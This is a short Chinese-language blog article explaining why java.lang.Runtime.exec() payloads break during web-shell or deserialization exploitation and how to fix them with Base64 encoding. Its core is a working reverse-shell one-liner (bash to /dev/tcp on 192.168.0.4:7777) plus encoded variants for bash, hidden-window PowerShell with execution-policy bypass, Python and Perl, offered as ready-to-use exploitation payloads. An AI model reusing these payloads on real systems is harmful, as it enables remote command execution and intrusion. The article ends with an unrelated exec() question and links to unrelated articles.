java.lang.Runtime.exec() Payload知識(shí)點(diǎn)詳解
有時(shí),通過(guò)Runtime.getRuntime().exec()執(zhí)行命令的有效負(fù)載有時(shí)會(huì)失敗。使用Web Shell,反序列化利用或通過(guò)其他媒介時(shí),可能會(huì)發(fā)生這種情況。
有時(shí)這是因?yàn)橹囟ㄏ蚝凸艿雷址氖褂迷趩?dòng)過(guò)程的上下文中沒(méi)有意義。例如,在shell中執(zhí)行l(wèi)s> dir_listing會(huì)將當(dāng)前目錄的列表輸出到名為dir_listing的文件中。但是在exec()函數(shù)的上下文中,該命令將被解釋為獲取>和dir_listing目錄的列表。
有時(shí),StringTokenizer類(lèi)會(huì)破壞其中包含空格的參數(shù),該類(lèi)將命令字符串按空格分隔。像ls“我的目錄”之類(lèi)的東西將被解釋為ls“我的目錄”。
借助Base64編碼,下面的轉(zhuǎn)換器可以幫助減少這些問(wèn)題。它可以通過(guò)調(diào)用Bash或PowerShell來(lái)制作管道并重新定向,還可以確保參數(shù)內(nèi)沒(méi)有空格。
樣例:
原文
bash -i >& /dev/tcp/192.168.0.4/7777 0>&1
編碼后:
bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}#bashpowershell.exe -NonI -W Hidden -NoP -Exec Bypass -Enc YgBhAHMAaAAgAC0AaQAgAD4AJgAgAC8AZABlAHYALwB0AGMAcAAvADEAOQAyAC4AMQA2ADgALgAwAC4ANAAvADcANwA3ADcAIAAwAD4AJgAxAA==#powershellpython -c exec(’YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=’.decode(’base64’))#pythonperl -MMIME::Base64 -e eval(decode_base64(’YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjAuNC83Nzc3IDA+JjE=’))#perl
中間的字符均為“base64”編碼。
知識(shí)點(diǎn)擴(kuò)展:
java.lang.Runtime.getRuntime().exec(cmd)命令中參數(shù)不能用空格怎么辦?
項(xiàng)目中無(wú)法執(zhí)行c程序,猜測(cè)是exec()函數(shù)的問(wèn)題
String cmd= exe_path + ' ' +video + ' ' +host + ':' + port;Process process = runtime.exec(cmd);
到此這篇關(guān)于java.lang.Runtime.exec() Payload知識(shí)點(diǎn)詳解的文章就介紹到這了,更多相關(guān)java.lang.Runtime.exec() Payload內(nèi)容請(qǐng)搜索好吧啦網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持好吧啦網(wǎng)!
相關(guān)文章:
1. jsp實(shí)現(xiàn)textarea中的文字保存換行空格存到數(shù)據(jù)庫(kù)的方法2. .Net Core和RabbitMQ限制循環(huán)消費(fèi)的方法3. ASP.NET MVC遍歷驗(yàn)證ModelState的錯(cuò)誤信息4. ASP 信息提示函數(shù)并作返回或者轉(zhuǎn)向5. ASP中if語(yǔ)句、select 、while循環(huán)的使用方法6. asp中response.write("中文")或者js中文亂碼問(wèn)題7. jsp網(wǎng)頁(yè)實(shí)現(xiàn)貪吃蛇小游戲8. PHP設(shè)計(jì)模式中工廠模式深入詳解9. 刪除docker里建立容器的操作方法10. asp(vbs)Rs.Open和Conn.Execute的詳解和區(qū)別及&H0001的說(shuō)明
